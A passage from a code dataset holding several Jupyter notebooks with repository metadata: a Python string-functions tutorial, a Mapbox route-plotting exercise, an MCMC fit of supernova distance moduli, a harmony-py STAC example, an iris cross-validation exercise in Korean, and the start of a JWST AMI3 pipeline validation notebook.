] | null | null | null | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
] | null | null | null | notebooks/Python3-Language/02-Python Basics/05-String Functions.ipynb | binakot/Python3-Course | c555fc7376c45f4b2dedb6d57363c0070831c1e1 | [
"MIT"
] | null | null | null | 16.657407 | 47 | 0.427738 | [
[
[
"Len and Count",
"_____no_output_____"
]
],
[
[
"x=\"hello, my name is Elias\"",
"_____no_output_____"
],
[
"len(x)",
"_____no_output_____"
],
[
"x[len(x)-1]",
"_____no_output_____"
],
[
"x.count('l')",
"_____no_output_____"
]
],
[
[
"Casing",
"_____no_output_____"
]
],
[
[
"x.capitalize()",
"_____no_output_____"
],
[
"upper_cased=x.upper()\nprint(upper_cased)",
"HELLO, MY NAME IS ELIAS\n"
],
[
"lower_cased=upper_cased.lower()\nprint(lower_cased)",
"hello, my name is elias\n"
],
[
"print(upper_cased.isupper())\nprint(lower_cased.islower())\nprint(x.isupper())\nprint(x.islower())",
"True\nTrue\nFalse\nFalse\n"
],
[
"print(x.find('l'))\nprint(x.find('l', 5))\nprint(x.find('l', 5, 10))\nprint(x.find('m', 7, 15))\nprint(x.find('m', 8, 15))",
"2\n19\n-1\n7\n12\n"
]
],
[
[
"Is Functions",
"_____no_output_____"
]
],
[
[
"print('123abc'.isalnum())\nprint('123abc!'.isalnum())",
"True\nFalse\n"
],
[
"print('123abc'.isalpha())\nprint('abc'.isalpha())",
"False\nTrue\n"
]
],
[
[
"Checking on emptyness",
"_____no_output_____"
]
],
[
[
"print(\" \".isspace())\nprint(\"\".isspace())",
"True\nFalse\n"
],
[
"print(\"\" == \"\")\nprint(\" \".strip(' ') == \"\")",
"True\nTrue\n"
],
[
"s = \"\"\nif not s:\n print(\"empty string\")",
"empty string\n"
],
[
"h = \"hello\"\nprint(h.startswith(\"he\"))\nprint(h.endswith(\"lo\"))",
"True\nTrue\n"
]
],
[
[
"Splitting and Partitioning",
"_____no_output_____"
]
],
[
[
"split = h.split('l')\nprint(type(split))\nprint(split)\nsplit = h.split('e')\nprint(split)",
"<class 'list'>\n['he', '', 'o']\n['h', 'llo']\n"
],
[
"sentence = \"12;10;8;10\"\nsentence.split(';')",
"_____no_output_____"
],
[
"string = \"Python is fun\"\n\n# 'is' separator is found\nprint(string.partition('is '))\n\n# 'not' separator is not found\nprint(string.partition('not '))\n\nstring = \"Python is fun, isn't it\"\n\n# splits at first occurence of 'is'\nprint(string.partition('is'))",
"('Python ', 'is ', 'fun')\n('Python is fun', '', '')\n('Python ', 'is', \" fun, isn't it\")\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2cc0ddbc6dd621d829b9cc7bc6f2a635d68116 | 5,829 | ipynb | Jupyter Notebook | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | class_work/06-Data-Visualization-with-PyViz-Day2-Solved/03-Stu_Cartographers_Expedition/Unsolved/cartographers_expedition.ipynb | MuayThaiLegz/Module_06 | 7fe05d68b064761c99438d21e786892c4eebe2c3 | [
"BSD-4-Clause-UC"
] | null | null | null | 25.343478 | 278 | 0.581232 | [
[
[
"# A Cartographers Expedition",
"_____no_output_____"
],
[
"You and your friends have decided to tackle NYC old school! No cell phones or GPS devices allowed. Although everyone is a bit nervous, you realize that using an actual map might be pretty cool.\n\nYour goal is to generate a map that plots your route between five and six locations in the city. Plotly Express and Mapbox should be used to plot the route (point A to point B to point C) for the expedition.",
"_____no_output_____"
],
[
"## Import the required libraries and dependencies",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport plotly.express as px\nimport os\nfrom pathlib import Path\nfrom dotenv import load_dotenv",
"_____no_output_____"
]
],
[
[
"## Step 1: Create a .env file to hold your Mapbox API Access Token",
"_____no_output_____"
],
[
"## Step 2: Read in the Mapbox API access token using the `os.getenv` function. Use the function provided to confirm that the token is available for use in the program. Finally, set your Mapbox API access token as the parameter in the `px.set_mapbox_access_token` function.",
"_____no_output_____"
]
],
[
[
"# Set up API credentials\n# Read the Mapbox API access token\n# YOUR CODE HERE\n\n# Confirm that the mapbox_api_access_token is available\nif not mapbox_api_access_token:\n print(\"Error with the Mapbox API access token. Check the .env file.\")\n",
"_____no_output_____"
],
[
"# Set the Mapbox API access token\n# YOUR CODE HERE",
"_____no_output_____"
]
],
[
[
"## Step 3: Read the `nyc_excursion_plans.csv` file into a Pandas DataFrame. Drop any rows that contain missing data or NaN values.",
"_____no_output_____"
]
],
[
[
"# Read the ny_places_interest.csv file into a DataFrame\nplaces_of_interest = # YOUR CODE HERE\n\n# Review the DataFrame\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 4: Slice the DataFrame to include the arrival airport and the first location",
"_____no_output_____"
]
],
[
[
"# Create a DataFrame with the arriving Airport and the first location you will visit\narrival_and_first_location = # YOUR CODE HERE\n\n# Plot the arriving airport and the first location\nfirst_route = # YOUR CODE HERE\n\n\n# Show the plot\n# YOUR CODE HERE",
"_____no_output_____"
]
],
[
[
"## Step 5: Plot the route between your first, second, and third locations.",
"_____no_output_____"
]
],
[
[
"# Plot the route between the first second and third locations\nfirst_second_third_locations = # YOUR CODE HERE\n\n# Create the plot including your first, second and third locations\nsecond_route = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 6: Plot the route between your third, fourth, and fifth locations.",
"_____no_output_____"
]
],
[
[
"## Step 6: Plot the route between your third, fourth, and fifth locations.\nthird_fourth_fifth_locations = # YOUR CODE HERE\n\n# Create the plot including your third, fourth and fifth locations\nthird_route = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"## Step 7: Plot all the stops in your excursion",
"_____no_output_____"
]
],
[
[
"# Plot course for all of the stops in your excursion, including the airport\nall_stops = # YOUR CODE HERE\n\n# Create the plot that shows all of you stops\nplot_all_stops = # YOUR CODE HERE\n\n# Show the Plot\n# YOUR CODE HERE\n",
"_____no_output_____"
]
],
[
[
"**Question** Given the location of the stops on your excursion, what is the order in which you should visit them to get you back to the airport most efficiently?\n\n**Answer** # YOUR ANSWER HERE",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2cca1f0ed71f51eeaf15dfd021be8e9b1460fe | 732,931 | ipynb | Jupyter Notebook | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | Project_MCMC.ipynb | aafaquerk/ASTR513_Project | 610cc46728cd94cf723e046d575dcab57c4b1a99 | [
"CC0-1.0"
] | null | null | null | 2,187.853731 | 384,489 | 0.683838 | [
[
[
"import emcee\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport chainconsumer \nimport matplotlib.pyplot as plt\nfrom scipy.integrate import quad\nfrom chainconsumer import ChainConsumer\nplt.rc('font', size=15) # controls default text sizes\nplt.rc('axes', titlesize=15) # fontsize of the axes title\nplt.rc('axes', labelsize=15) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=12) # fontsize of the tick labels\nplt.rc('ytick', labelsize=12) # fontsize of the tick labels\nplt.rc('legend', fontsize=12) # legend fontsize\n%config InlineBackend.figure_format = 'svg'\n",
"_____no_output_____"
],
[
"data_pd = pd.read_csv(\"hlsp_ps1cosmo_panstarrs_gpc1_all_model_v1_lcparam-full.txt\",sep=' ',usecols=[0,1,2,3,4,5])\n# use the builtin float: np.float was removed in NumPy 1.24+\nz = data_pd['zhel'].astype(float)\ndz = data_pd['dz'].astype(float)\nmuB = data_pd['mb'].astype(float)\ndmuB = data_pd['dmb'].astype(float)\n\ndata = {}\ndata['z'] = z\ndata['dz'] = dz\ndata['muB'] = muB\ndata['dmuB'] = dmuB",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = [20, 12] # set plotsize\nplt.rcParams.update({'font.size': 22}) # set fontsize\nfig,ax = plt.subplots(1,1)\nxlim = (0, 2)\nylim = (13, 27)\n#xlabel = r\"$z$\"\n#ylabel = r\"$\\mu_{B}$\"\n\nax.errorbar(x=z,y=muB,xerr=dz,yerr=dmuB,linestyle='None')\nax.set_xlim(xlim)\nax.set_ylim(ylim)\nleg = ax.legend(loc='lower right')\nax.set_xlabel('Redshift (z)')\nax.set_ylabel('Distance modulus (mu)')\nax.set_title('Distance modulus vs redshift for Type 1a SNe ')",
"WARNING:matplotlib.legend:No handles with labels found to put in legend.\n"
],
[
"\ndef get_default_parameters(update=None):\n pars = {}\n pars['omega_m'] = 0.3\n pars['omega_L'] = 0.7\n pars['omega_K'] = 0.0\n pars['h'] = 0.72\n pars['w'] = -1.\n if update is not None:\n pars.update(update)\n return pars\n\ndef get_starting_point(name_list):\n sp = {}\n sp['omega_m'] = 0.24\n sp['omega_L'] = 0.74\n sp['omega_K'] = 0.0\n sp['h'] = 0.65\n sp['w'] = -1. \n return np.array([sp[x] for x in name_list])\n\ndef get_latex_names(name_list):\n latex_names = {}\n latex_names['omega_m'] = '$\\Omega_m$'\n latex_names['omega_L'] = '$\\Omega_L$'\n latex_names['omega_K'] = '$\\Omega_K$'\n latex_names['h'] = '$h$'\n latex_names['w'] = '$w$'\n \n return [latex_names[x] for x in name_list]\n#constraints on the parameter values\nparameter_limits={\n 'omega_m' : [0., 1.],\n 'omega_L' : [0., 1.],\n 'omega_K' : [0., 0.], #Flat Universe\n 'h' : [.2, 1.],\n 'w' : [-1., -1.] #Lambda CDM\n }",
"_____no_output_____"
],
[
"def log_prior(pars, names):\n count = 0\n for name in names:\n limits = parameter_limits[name]\n low, high = limits[0], limits[1]\n if pars[name]<low or pars[name]>high:\n count+=1\n if count!=0:\n return -np.inf\n else: \n prior = 0\n prior += ((pars['h']-0.6766)/0.0042)**2 #Planck h gaussian\n prior += ((pars['omega_m']-0.315)/0.007)**2 #Planck Omega_m gaussian\n return prior\n\ndef log_likelihood(fit_par_values, fit_par_names, flat):\n # f_gas data\n z, muB, dmuB = data['z'], data['muB'], data['dmuB']\n \n pars = get_default_parameters()\n \n for par_value, par_name in zip(fit_par_values, fit_par_names):\n pars[par_name] = par_value\n \n if not np.isfinite(log_prior(pars, fit_par_names)):\n return -np.inf\n \n else:\n log_likelihood = 0.\n \n if flat==True:\n pars['omega_L'] = 1 - pars['omega_m']\n pars['omega_K'] = 0.\n else:\n pars['omega_K'] = 1 - pars['omega_m'] - pars['omega_K']\n\n\n for z_i, muB_i, dmuB_i in zip(z,muB,dmuB): \n muB_model = mu_model(z_i, pars)\n log_likelihood +=((muB_i-muB_model)**2)/(dmuB_i)**2\n\n return -log_likelihood - log_prior(pars, fit_par_names)\n",
"_____no_output_____"
],
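For clarity, the value this function returns to emcee is the negative of a total chi-square: the supernova term plus the Gaussian Planck priors on h and Omega_m encoded in `log_prior`. A sketch of the intended objective is below; note that the conventional Gaussian form carries a factor of 1/2 that the code omits, which mainly rescales the quoted parameter uncertainties.

```latex
\ln \mathcal{L}(\theta) \;\propto\;
-\sum_i \frac{\left[\mu_i - \mu_{\rm model}(z_i;\theta)\right]^2}{\sigma_{\mu_i}^2}
\;-\;\left(\frac{h-0.6766}{0.0042}\right)^2
\;-\;\left(\frac{\Omega_m-0.315}{0.007}\right)^2
```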
[
"def E_z(z, pars):\n omega_m = pars['omega_m']\n omega_L = pars['omega_L']\n omega_K = 0\n w = pars['w']\n EoS = (1+z)**(3*(1+w))\n return np.sqrt(omega_m*(1+z)**3 + omega_L*EoS + omega_K*(1+z)**2)\n\ndef one_over_E_z(z, pars):\n return 1/E_z(z, pars)\n\ndef d_l(z, pars):\n #scale hubble paramter\n H0 = pars['h']*100\n #speed of light\n c = 299792.458 # c in km/s\n #integrate for DL based on the given values of paratmers\n integral = quad(one_over_E_z, 0.01, z, args=(pars))[0]\n factor =c/(H0*(1+z))\n return factor*integral\n\ndef mu_model(z, pars):\n return 5*np.log10(d_l(z,pars))+25\n",
"_____no_output_____"
],
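For reference, the textbook relations these helpers are built around are written out below; note that the standard luminosity distance multiplies the comoving distance by (1+z), whereas `d_l` above divides by it (`factor = c/(H0*(1+z))`), so that factor is worth double-checking against the intended definition.

```latex
E(z) = \sqrt{\Omega_m (1+z)^3 + \Omega_\Lambda (1+z)^{3(1+w)} + \Omega_K (1+z)^2}\,,
\qquad
d_L(z) = (1+z)\,\frac{c}{H_0}\int_0^{z}\frac{dz'}{E(z')}\,,
\qquad
\mu(z) = 5\log_{10}\!\left[\frac{d_L(z)}{\mathrm{Mpc}}\right] + 25\,.
```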
[
"def run_mcmc(fit_par_names, flat=True):\n pars = get_default_parameters()\n starting_point = get_starting_point(fit_par_names)\n std = 0.2*starting_point\n ndim = len(fit_par_names)\n nwalkers = 32\n\n p0 = emcee.utils.sample_ball(starting_point, std, size=nwalkers)\n sampler = emcee.EnsembleSampler(nwalkers, ndim, log_likelihood, args=[fit_par_names,flat])\n sampler.run_mcmc(p0, 20000, progress=True);\n samples = sampler.get_chain(discard=10000, flat=True)\n\n if flat==True and 'omega_m' in fit_par_names:\n #print('first one')\n\n samples_new = np.column_stack((1-samples[:,0], samples))\n \n elif flat==False and 'omega_m' in fit_par_names:\n #print('second one')\n try:\n samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-\n samples[:,fit_par_names.index('omega_L')], samples))\n except:\n samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-\n pars['omega_L'], samples))\n else:\n samples_new = samples\n return samples_new",
"_____no_output_____"
],
[
"fit_par_names = ['omega_m', 'h']\nchain = run_mcmc(fit_par_names, flat=True)",
"100%|██████████| 20000/20000 [01:26<00:00, 232.42it/s]\n"
],
[
"par_names_latex = get_latex_names(['omega_L']+fit_par_names)\n\n\nc = ChainConsumer().add_chain(chain, parameters=par_names_latex).configure(statistics=\"max\", summary=True,usetex=False)\nfig = c.plotter.plot()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
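A minimal, self-contained sketch of the flat-ΛCDM distance modulus that the sampler above fits; the fiducial parameter values (Ωm = 0.3, h = 0.7) are illustrative assumptions, not fitted results from the notebook.

```python
import numpy as np
from scipy.integrate import quad

def E(z, omega_m=0.3, w=-1.0):
    # Flat universe: omega_L = 1 - omega_m, so the curvature term drops out
    return np.sqrt(omega_m * (1 + z)**3 + (1 - omega_m) * (1 + z)**(3 * (1 + w)))

def distance_modulus(z, omega_m=0.3, h=0.7, w=-1.0):
    c = 299792.458                       # speed of light in km/s
    H0 = 100.0 * h                       # Hubble constant in km/s/Mpc
    comoving, _ = quad(lambda zp: 1.0 / E(zp, omega_m, w), 0.0, z)
    d_L = (1 + z) * (c / H0) * comoving  # luminosity distance in Mpc
    return 5 * np.log10(d_L) + 25

print(distance_modulus(0.5))  # roughly 42.3 for the fiducial parameters
```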
cb2cd890e004077e34dc92de53cc02e9065d20ab | 3,331 | ipynb | Jupyter Notebook | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 25 | 2021-02-19T17:45:49.000Z | 2022-02-27T22:09:13.000Z | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 19 | 2021-02-09T21:18:02.000Z | 2022-01-03T17:00:44.000Z | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 13 | 2021-01-25T16:14:03.000Z | 2021-11-04T15:08:16.000Z | 23.792857 | 148 | 0.563795 | [
[
[
"## Harmony Py Library\n### Job Results STAC data",
"_____no_output_____"
]
],
[
[
"import sys\nsys.path.append('..')\n!{sys.executable} -m pip install -q -r ../requirements/examples.txt\n\n# Install harmony-py requirements. Not necessary if you ran `pip install harmony-py` in your kernel \n!{sys.executable} -m pip install -q -r ../requirements/core.txt\n\nfrom harmony import BBox, Client, Collection, Request, Environment\n",
"_____no_output_____"
]
],
[
[
"First, let's get a job processing in Harmony.",
"_____no_output_____"
]
],
[
[
"harmony_client = Client(env=Environment.UAT) # assumes .netrc usage\n\ncollection = Collection(id='C1234088182-EEDTEST')\nrequest = Request(\n collection=collection,\n spatial=BBox(-165, 52, -140, 77)\n)\n\njob_id = harmony_client.submit(request)\njob_id\n",
"_____no_output_____"
]
],
[
[
"Harmony-py can return the STAC Catalog URL for a completed job.",
"_____no_output_____"
]
],
[
[
"stac_catalog_url = harmony_client.stac_catalog_url(job_id, show_progress=True)\n",
"_____no_output_____"
]
],
[
[
"Following the directions for PySTAC (https://pystac.readthedocs.io/en/latest/quickstart.html), we can hook our harmony-py client into STAC_IO.",
"_____no_output_____"
]
],
[
[
"from urllib.parse import urlparse\nimport requests\nfrom pystac import STAC_IO\n\ndef requests_read_method(uri):\n parsed = urlparse(uri)\n if parsed.hostname.startswith('harmony.'):\n return harmony_client.read_text(uri)\n else:\n return STAC_IO.default_read_text_method(uri)\n\nSTAC_IO.read_text_method = requests_read_method",
"_____no_output_____"
],
[
"from pystac import Catalog\n\ncat = Catalog.from_file(stac_catalog_url)\n\nprint(cat.title)\nfor item in cat.get_all_items():\n print(item.datetime, [asset.href for asset in item.assets.values()])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2cdada48c59d06749ccecd5e3e08640ab46352 | 14,181 | ipynb | Jupyter Notebook | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | 1 | 2020-08-05T16:29:27.000Z | 2020-08-05T16:29:27.000Z | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | null | null | null | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | null | null | null | 28.475904 | 1,357 | 0.417742 | [
[
[
"# 붓꽃(Iris) 품종 데이터 예측하기\n\n",
"_____no_output_____"
],
[
"<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#DataFrame\" data-toc-modified-id=\"DataFrame-1\"><span class=\"toc-item-num\">1 </span>DataFrame</a></span></li><li><span><a href=\"#Train/Test-데이터-나누어-학습하기\" data-toc-modified-id=\"Train/Test-데이터-나누어-학습하기-2\"><span class=\"toc-item-num\">2 </span>Train/Test 데이터 나누어 학습하기</a></span></li><li><span><a href=\"#데이터-학습-및-평가하기\" data-toc-modified-id=\"데이터-학습-및-평가하기-3\"><span class=\"toc-item-num\">3 </span>데이터 학습 및 평가하기</a></span></li><li><span><a href=\"#교차-검증-(Cross-Validation)\" data-toc-modified-id=\"교차-검증-(Cross-Validation)-4\"><span class=\"toc-item-num\">4 </span>교차 검증 (Cross Validation)</a></span><ul class=\"toc-item\"><li><span><a href=\"#교차검증-종류\" data-toc-modified-id=\"교차검증-종류-4.1\"><span class=\"toc-item-num\">4.1 </span>교차검증 종류</a></span></li><li><span><a href=\"#Kfold\" data-toc-modified-id=\"Kfold-4.2\"><span class=\"toc-item-num\">4.2 </span>Kfold</a></span></li><li><span><a href=\"#StratifiedKFold\" data-toc-modified-id=\"StratifiedKFold-4.3\"><span class=\"toc-item-num\">4.3 </span>StratifiedKFold</a></span></li><li><span><a href=\"#LeaveOnOut\" data-toc-modified-id=\"LeaveOnOut-4.4\"><span class=\"toc-item-num\">4.4 </span>LeaveOnOut</a></span></li></ul></li></ul></div>",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn import * \nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score",
"_____no_output_____"
]
],
[
[
"## DataFrame",
"_____no_output_____"
]
],
[
[
"iris = load_iris()\niris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names)\niris_df['label'] = iris.target\niris_df",
"_____no_output_____"
],
[
"iris_df.shape",
"_____no_output_____"
]
],
[
[
"## Train/Test 데이터 나누어 학습하기",
"_____no_output_____"
]
],
[
[
"X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target,\n test_size = 0.3,\n random_state = 100)",
"_____no_output_____"
]
],
[
[
"## 데이터 학습 및 평가하기\n\n사용 할 모델_ LGBM\n```python \nfrom lightgbm import LGBMClassifier\nmodel_lgbm = LGBMClassifier() # 모델정의하기 \nmodel_lgbm.fit(???,???) # 모델학습\nmodel_lgbm.score(???,???) # 모델점수보기 \nmodel_lgbm.predict(???,???) # 모델 학습결과저장 \n```",
"_____no_output_____"
]
],
[
[
"# 모델정의하기 \n# 모델학습\n# 모델점수보기 \n# 모델 학습결과저장 ",
"_____no_output_____"
]
],
[
[
"## 교차 검증 (Cross Validation)\n\n\n### 교차검증 종류 \n1. K-fold Cross-validation\n - 데이터셋을 K개의 sub-set으로 분리하는 방법 \n - 분리된 K개의 sub-set중 하나만 제외한 K-1개의 sub-sets를 training set으로 이용하여 K개의 모델 추정\n - 일반적으로 K=5, K=10 사용 (-> 논문참고)\n - K가 적어질수록 모델의 평가는 편중될 수 밖에 없음\n - K가 높을수록 평가의 bias(편중된 정도)는 낮아지지만, 결과의 분산이 높을 수 있음\n\n\n2. LOOCV (Leave-one-out Cross-validation)\n - fold 하나에 샘플 하나만 들어있는 K겹 교차 검증\n - K를 전체 숫자로 설정하여 각 관측치가 데이터 세트에서 제외될 수 있도록 함\n - 데이터셋이 클 때는 시간이 매우 오래 걸리지만, 작은 데이터셋에서는 좋은 결과를 만들어 냄\n - 장점 : Data set에서 낭비 Data 없음\n - 단점 : 측정 및 평가 고비용 소요\n \n\n \n3. Stratified K-fold Cross-validation\n - 정답값이 모든 fold에서 대략 동일하도록 선택됨\n - 각 fold가 전체를 잘 대표할 수 있도록 데이터를 재배열하는 프로세스\n\n",
"_____no_output_____"
],
[
"### Kfold\n```python\nfrom sklearn.model_selection import KFold\nkfold = KFold(n_splits = 5, shuffle=False) # 교차검증 방법 설정\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\ncross_val_score(????, iris.data, iris.target, cv=kfold)\n\n```",
"_____no_output_____"
],
[
"### StratifiedKFold\n```python\nfrom sklearn.model_selection import StratifiedKFold\nskfold = StratifiedKFold(n_splits = 5, shuffle=False) #교차검증 방법 설정 \n\ncross_val_score(???,\n iris.data,\n iris.target,\n cv=skfold # 나눌 덩어리 횟수\n )\n```",
"_____no_output_____"
],
[
"### LeaveOnOut \n```python \nfrom sklearn.model_selection import LeaveOneOut\nleavefold = LeaveOneOut() #교차검증 방법 설정 \n\ncross_val_score(???,\n iris.data,\n iris.target,\n cv=leavefold # 나눌 덩어리 횟수\n )\n\n```",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
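A hedged sketch of how the cross-validation exercises above could be filled in using only scikit-learn; a DecisionTreeClassifier stands in for the LGBM model so the snippet runs even without lightgbm installed.

```python
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import KFold, StratifiedKFold, cross_val_score

iris = load_iris()
model = DecisionTreeClassifier(random_state=0)

kfold = KFold(n_splits=5, shuffle=True, random_state=0)              # plain K-fold
skfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=0)   # label-balanced folds

print("KFold          :", cross_val_score(model, iris.data, iris.target, cv=kfold))
print("StratifiedKFold:", cross_val_score(model, iris.data, iris.target, cv=skfold))
```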
cb2cfe52ab994a61bca75b95090aa2c5bdd33c41 | 23,994 | ipynb | Jupyter Notebook | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | 33.325 | 331 | 0.568017 | [
[
[
"<a id=\"title_ID\"></a>\n# JWST Pipeline Validation Notebook: AMI3, AMI3 Pipeline\n\n<span style=\"color:red\"> **Instruments Affected**</span>: NIRISS\n\n### Table of Contents\n\n<div style=\"text-align: left\"> \n \n<br> [Introduction](#intro)\n<br> [JWST CalWG Algorithm](#algorithm)\n<br> [Defining Terms](#terms)\n<br> [Test Description](#description)\n<br> [Data Description](#data_descr)\n<br> [Set up Temporary Directory](#tempdir)\n<br> [Imports](#imports)\n<br> [Loading the Data](#data_load)\n<br> [Run the Pipeline](#pipeline)\n<br> [Test Results](#testing)\n<br> [About This Notebook](#about) \n\n</div>",
"_____no_output_____"
],
[
"<a id=\"intro\"></a>\n# Introduction\n\nThe notebook verifies that pipeline steps from `calwebb_detector1` through `calwebb_image2` and `calwebb_ami3` run without crashing. `calwebb_ami3` is run on various associations of target and calibrator pairs.\n\nFor more information on the `calwebb_ami3` pipeline stage visit the links below. \n\n> Stage description: https://jwst-pipeline.readthedocs.io/en/latest/jwst/pipeline/calwebb_ami3.html\n>\n> Pipeline code: https://github.com/spacetelescope/jwst/tree/master/jwst/ami\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"algorithm\"></a>\n# JWST CalWG Algorithm\n\n`calwebb_ami3` is based on the `implaneia` algorithm:\n> https://github.com/anand0xff/ImPlaneIA/tree/delivery\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"terms\"></a>\n# Defining Terms\n\nCalibrator: reference star to measure PSF to calibrate out instrumental contributions to the interferometric observables \n\nPSF: point spread function\n\nTarget: source of interest for science program \n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"description\"></a>\n# Test Description\n\nThis test checks that simulated data runs through the `calwebb_detector1`, `calwebb_image2`, and `calwebb_ami3` steps of the pipeline without crashing. Association files are created for the target/calibrator pair at different dither positions. The notebook verifies that the `calwebb_ami3` runs on these association files.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"data_descr\"></a>\n# Data Description\n\nThe data for this test are simulated AMI datasets that do not have bad pixels. The simulated source data is AB Dor, which is simulated with a 4-point dither pattern:\n\n| Source | Filename| Dither Position |\n|:----------------|:---------|:-----------------|\n|AB Dor (Target) |jw01093001001_01101_00005_nis_uncal.fits| 1|\n| |jw01093001001_01101_00006_nis_uncal.fits| 2 |\n| |jw01093001001_01101_00007_nis_uncal.fits| 3 |\n| |jw01093001001_01101_00005_nis_uncal.fits| 4 |\n\nHD 37093 is the PSF reference star, which is also simulated with a 4-point dither pattern.\n\n| Source | Filename| Dither Position |\n|:----------------|:---------|:-----------------|\n|HD 37093 (Calibrator)| jw01093002001_01101_00005_nis_uncal.fits | 1 |\n| |jw01093002001_01101_00006_nis_uncal.fits | 2 |\n| |jw01093002001_01101_00007_nis_uncal.fits | 3 |\n| |jw01093002001_01101_00005_nis_uncal.fits | 4 |\n\nConfiguration files are also needed for the various `calwebb_ami3` steps:\n- ami_analyze.cfg\n- ami_normalize.cfg\n- ami_average.cfg\n- calwebb_ami3.cfig\n\nSpecific reference files are needed for the analysis, which also do not have bad pixels, and are loaded with this notebook.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
